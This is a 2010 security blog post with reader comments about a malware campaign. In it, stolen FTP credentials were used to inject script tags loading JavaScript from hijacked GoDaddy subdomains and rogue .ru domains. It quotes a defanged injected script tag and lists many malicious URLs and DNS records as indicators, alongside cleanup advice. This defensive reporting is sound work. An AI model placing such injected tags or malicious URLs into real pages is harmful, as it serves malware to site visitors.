msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Malware on Hijacked Subdomains. Part 2.

   17 Jun 10   Filed in Website exploits

About a month ago I wrote about a hacker attack that used hijacked subdomains of legitimate websites to serve malware (fake anti-virus software) off of them. Most likely cyber criminals used a phishing attack to steal credentials of GoDaddy’s domain management control panel and created rogue DNS records for some subdomains to make them point to hacker-controlled servers.

In that article I wondered if that was a new trend (usage of virtually free hijacked subdomains) or just temporary approach that wouldn’t be used anywhere else. Well, this week I came across a different malware attack that also uses hijacked subdomains of legitimate websites.

The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:

<sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube.js"></sc ript>
<!--8469f3ebb36bebb12b39b0f9e7fe5933-->

The scripts reminds of many other attacks that used nginx reverse proxy on port 8080 on compromised servers (in this case this is true too).

Script names

I checked many infected sites and noticed that the injected scripts always used the same 5 subdomains and changed the file name part of the script from site to site. They always used Internet/computer related file names, e.g.: YouTube.js, Virtual_Reality.js, Backup.js, Unfriend.js, Keystroke.js, Access.js, Technology_Services.js, Page_View.js, Gigahertz.js, Telnet.js, Data_Type.js, Paste.js, Gnutella.js, Website.js, etc.

Hijacked subdomains

The 5 subdomains are (there may be more but I only seen these five):

  • oployau .fancountblogger .com
  • sorydory .russellhowe .com
  • aospfpgy .dogplaystation .com
  • kollinsoy .skyefenton .com
  • temp .hbsouthmomsclub .com

Update: You can find many more hijacked subdomains in comments.

Each of them points to different IPs on different networks. And none of the IPs matches the IP (or even network) of their second-level domains.

All the second-level domains have been registered and now managed via GoDaddy. Some of them point to real legitimate websites and others are just parked domains.

It’s clear that hackers somehow gained access to those domains’ DNS management panel and created rogue DNS records for subdomains that legitimate domain owners cannot even imagine exist.

oployau.fancountblogger.com. 937 IN A 78.137.161.186
sorydory.russellhowe.com. 3530 IN A 88.198.25.170
aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15
kollinsoy.skyefenton.com. 399 IN A 194.150.236.199
temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23

This is the second attack in a short time that uses this approach to get free domain names to use in malware distribution. I guess, it is still to early to call this a trend, but it’s definitely something that we should keep an eye on.

To domain owners

When was the last time you checked DNS records of your domains? Are you sure there are no rogue subdomains that criminals use behind your back? Probably it’s time to check your domain settings now. But don’t forget about phishing attacks – make sure you are logging into a genuine site of your registrar. (Check GoDaddy’s security tips)

To webmasters

If you found one of the above scripts in your web pages (you can use Unmask Parasites to detect them) do the following:

  1. Scan your computer for malware.
  2. When you are sure it is clean, change all site passwords.
  3. Don’t save new passwords in FTP clients (unless they provide a master key encryption)
  4. If possible, use only secure file transfer protocols (e.g. SFTP or FTPS). Plain FTP is very insecure.
  5. Remove the malicious scripts from files on server. Note, the scripts may also be injected into .js files. Sometimes hackers even create malicious .js files on compromised servers. If you don’t want to miss any infected files, consider removing everything and then restoring the site from a clean backup copy.
  6. If your site is blacklisted by Google, you need to request a malware review via Google Webmaster Tools (Diagnostics -> Malware). You can read more about it in my guide.

Have your say

Do you know any other malware attacks that use hijacked subdomains of legitimate websites? Can we call this a new trend?

Related posts:

Reader's Comments (11)

  1. |

    Here are two more domains which have been used in this attack

    foxy.divarug .com
    blog.bigsophieblog .com

    As with the others, registration and DNS hosted by GoDaddy. While GoDaddy has a large percentage of the registration business and are a major DNS provider for low budget domains, the fact that ALL domains being used involve GoDaddy suggests that the hackers have discovered an exploit allowing them access to GoDaddy accounts (or have access to GoDaddy accounts through some other means).

    • |

      I’ve also found a new hijacked domain today:
      iopap.upperdarby26 .com

      And I still think that it was a phishing attack that helped criminals get access to certain domains’ DNS records. There are many known GoDaddy phishing attacks (mainly via email spam).

      If it was some exploitable security hole in GoDaddy’s domain management service, I’m afraid, we would have seed much more hijacked subdomains and altogether stolen domain names.

  2. |

    I find new hijacked subdomains almost every day so I decided to post them here:

    blog.locatejobs .org:8080/File.js
    dodo.busop .info:8080/Emoticon.js
    adoffy.alltuckedinathome .com:8080/LED.js
    dolgo.lulucabana .com:8080/Data.js
    soaoo.blog-salopes .com:8080/Access_Point.js
    asol.vmtechsolutions .biz:8080/File.js
    sokyoss.drelshazly .com:8080/E-commerce.js
    questtore.hermosayasociados .com:8080/Base_Station.js
    solk.seamscreative .info:8080/Undo.js
    sfofotky.iexam .info:8080/ODBC.js
    kolpo.gunterschaub .com:8080/Keywords.js
    dolfy.sedonahyperbarics .com:8080/File.js
    golaogp.islamicweightloss .com:8080/Real-Time.js
    asoosp.acilalisveris .com:8080/OASIS.js
    assol.metro-trading .net:8080/Link.js
    blog.nodisposable .com:8080/URL.js
    sogpaoiy.the-mlmpowercall .com/Zettabyte.js

  3. |

    Hi Denis,

    This seems to be part this injection

    http://www.sophos.com/blogs/sophoslabs/?p=10417

    pob

  4. |

    It might be a trend, i also had an infected site with the same kind of scripts inserted, this one pointed to

    hxxp://pantscow .ru:8080/OASIS.js

    (no subdomain here!)

    The infected site was not hosted by GoDaddy this time, but by a company named realhosting.nl. After changing the FTP password the site was infected again, so i guess someone found an exploit to gain access to their servers as well. I informed the hosting provider…

    • |

      They don’t resort to only hijacked subdomains. They also use their own domains (as they did before the subdomains).

      Again, each of them point to 5 different IPs where they set up reverse proxies


      pantscow .ru. 78 IN A 94.23.34.93
      pantscow .ru. 78 IN A 87.98.136.164
      pantscow .ru. 78 IN A 94.23.231.140
      pantscow .ru. 78 IN A 94.23.240.219
      pantscow .ru. 78 IN A 91.121.184.181

      hxxp://pansolo .ru/Web_Host.js

      hxxp://greatrow .ru/End_User.js

      hxxp://nuttypiano .com/LAN.js
      nuttypiano .com. 66 IN A 91.121.61.207
      nuttypiano .com. 66 IN A 91.121.135.109
      nuttypiano .com. 66 IN A 94.32.66.150
      nuttypiano .com. 66 IN A 213.165.91.101
      nuttypiano .com. 66 IN A 82.103.129.152

      hxxp://addonrock .ru/Emulation.js
      addonrock .ru. 83 IN A 212.57.179.29
      addonrock .ru. 83 IN A 66.241.102.159
      addonrock .ru. 83 IN A 66.241.102.166
      addonrock .ru. 83 IN A 85.90.233.171
      addonrock .ru. 83 IN A 89.39.203.134

      hxxp://subbell .ru/LIFO.js
      subbell .ru. 432 IN A 94.23.202.33
      subbell .ru. 432 IN A 109.168.126.54
      subbell .ru. 432 IN A 195.2.139.31
      subbell .ru. 432 IN A 88.191.96.7
      subbell .ru. 432 IN A 88.208.234.222

      idealdesk .ru. 432 IN A 94.23.60.106
      idealdesk .ru. 432 IN A 178.32.5.232
      idealdesk .ru. 432 IN A 188.165.192.106
      idealdesk .ru. 432 IN A 91.121.96.212
      idealdesk .ru. 432 IN A 94.23.24.90

      farbaby .ru. 432 IN A 88.191.96.7
      farbaby .ru. 432 IN A 88.208.234.222
      farbaby .ru. 432 IN A 94.23.202.33
      farbaby .ru. 432 IN A 109.168.126.54
      farbaby .ru. 432 IN A 195.2.139.31

      hxxp://dullplane .ru/Webmaster.js
      dullplane .ru. 344 IN A 94.23.202.33
      dullplane .ru. 344 IN A 216.66.78.137
      dullplane .ru. 344 IN A 88.191.96.7
      dullplane .ru. 344 IN A 88.208.234.222
      dullplane .ru. 344 IN A 93.157.232.64

      hxxp://youngarea .ru/AGP.js
      youngarea .ru. 395 IN A 88.191.96.7
      youngarea .ru. 395 IN A 88.208.234.222
      youngarea .ru. 395 IN A 93.157.232.64
      youngarea .ru. 395 IN A 94.23.202.33
      youngarea .ru. 395 IN A 216.66.78.137

      hxxp://hugejar .com:8080/Bandwidth.js
      hxxp://trapbarf .ru/IM.js

      hxxp://shelfmurder .ru/QWERTY.js
      hxxp://cutboss .ru/RADCAB.js

      hxxp://riotassistance .ru/Template.js
      riotassistance.ru. 395 IN A 217.195.160.74
      riotassistance .ru. 395 IN A 77.37.21.166
      riotassistance .ru. 395 IN A 77.235.44.94
      riotassistance .ru. 395 IN A 88.191.47.83
      riotassistance .ru. 395 IN A 93.157.232.64

      hxxp://pocketbloke .ru/Tebibyte.js
      pocketbloke .ru. 344 IN A 77.235.44.94
      pocketbloke .ru. 344 IN A 88.191.47.83
      pocketbloke .ru. 344 IN A 93.157.232.64
      pocketbloke .ru. 344 IN A 217.195.160.74
      pocketbloke .ru. 344 IN A 77.37.21.166

      hxxp://hairyartist .ru/JPEG.js
      hairyartist .ru. 432 IN A 97.107.132.41
      hairyartist .ru. 432 IN A 188.40.58.19
      hairyartist .ru. 432 IN A 85.120.34.244
      hairyartist .ru. 432 IN A 88.191.47.83
      hairyartist .ru. 432 IN A 89.19.5.116

      hxxp://obscurewax .ru/Scroll_Wheel.js

      obscurewax .ru. 388 IN A 217.151.230.10
      obscurewax .ru. 388 IN A 188.40.58.19
      obscurewax .ru. 388 IN A 88.191.47.83
      obscurewax .ru. 388 IN A 85.120.34.244
      obscurewax .ru. 388 IN A 212.176.115.141

      Another variant: hxxp://roundstorm .com:8080/Megabyte.js

      roundstorm .com. 432 IN A 91.121.162.65
      roundstorm .com. 432 IN A 194.24.228.81
      roundstorm .com. 432 IN A 213.175.207.140
      roundstorm .com. 432 IN A 62.212.132.226
      roundstorm .com. 432 IN A 88.84.145.36

      serfinworld.com. 900 IN A 201.233.32.161
      serfinworld.com. 900 IN A 71.205.41.75
      serfinworld.com. 900 IN A 70.66.77.227
      serfinworld.com. 900 IN A 173.30.189.230
      serfinworld.com. 900 IN A 71.192.136.228

      profincorp.com. 900 IN A 71.192.136.228
      profincorp.com. 900 IN A 70.66.77.227
      profincorp.com. 900 IN A 173.30.189.230
      profincorp.com. 900 IN A 201.233.32.161
      profincorp.com. 900 IN A 71.205.41.75

      diseasednoodle.ru. 432 IN A 91.121.188.123
      diseasednoodle.ru. 432 IN A 188.165.95.133
      diseasednoodle.ru. 432 IN A 188.165.212.54
      diseasednoodle.ru. 432 IN A 87.98.147.134
      diseasednoodle.ru. 432 IN A 91.121.108.61

  5. |

    [...] by Oliver Day Mon, 26 Jul 2010 20:43:41 GMT Last month the Unmask Parasites blog wrote about attacks using hijacked sudomains of legitimate websites to serve badware.  At the [...]

  6. |

    My blog has been hit with the “this site may be harmful if you are on it” so many times within the past months that I’ve lost track. Each time I go through the whole deal that is required of us to perform. This time however I had help with someone who knows more about tech-stuff than I do, and we found a correlation between HostGator vs. THEPLANET and the malware hit site. It seems that THEPLANET is a server for HG which in turns causes problems for anyone who has HG as their hosting co. Do you know any info. regarding this,we went to StopBadware.org and found out about this relationship. I would appreciate it if you could explain it in an easy way for some of us to wrap our heads around. Thanks so much, JJ

  7. |

    Got hit as well.

    no subdomains

    addonrock. ru/ keystroke.js
    alienware. ru/ keystroke.js

    they changed all *.js, all *.php, all *.htm files with this script

    websites which were infected were hosted by 1and1 in Germany (1und1.de)

  8. |

    it was

    alienradar. ru/ keystroke.js

    not alienware. ru

    my mistake- sorry

  9. |

    Recently my domain was hacked through the appending of the .htaccess file on Godaddy. It would redirect the browser to a .ru site if it’s referred by google, facebook, twitter, those popular search engines. So I did a force rewrite on the .htaccess, but once or twice a week the file’s permission gets changed and the .htaccess file is appended with those redirecting codes again.

    And what is really weird is that if I make my .htaccess empty, it would redirect the those referred link directly to .ru site again.

    I contacted Godaddy several times with their online support and all I get is generic support. It seems as if the shared hosting server that I’m on is infected. I have requested FTP log and there isn’t any log during the time the file was changed

    What other file could cause the site to redirect other than the .htacess? I have removed all files in the root directory and leave with just one index.php file. It still redirect me to outside server if I change my .htaccess file to blank.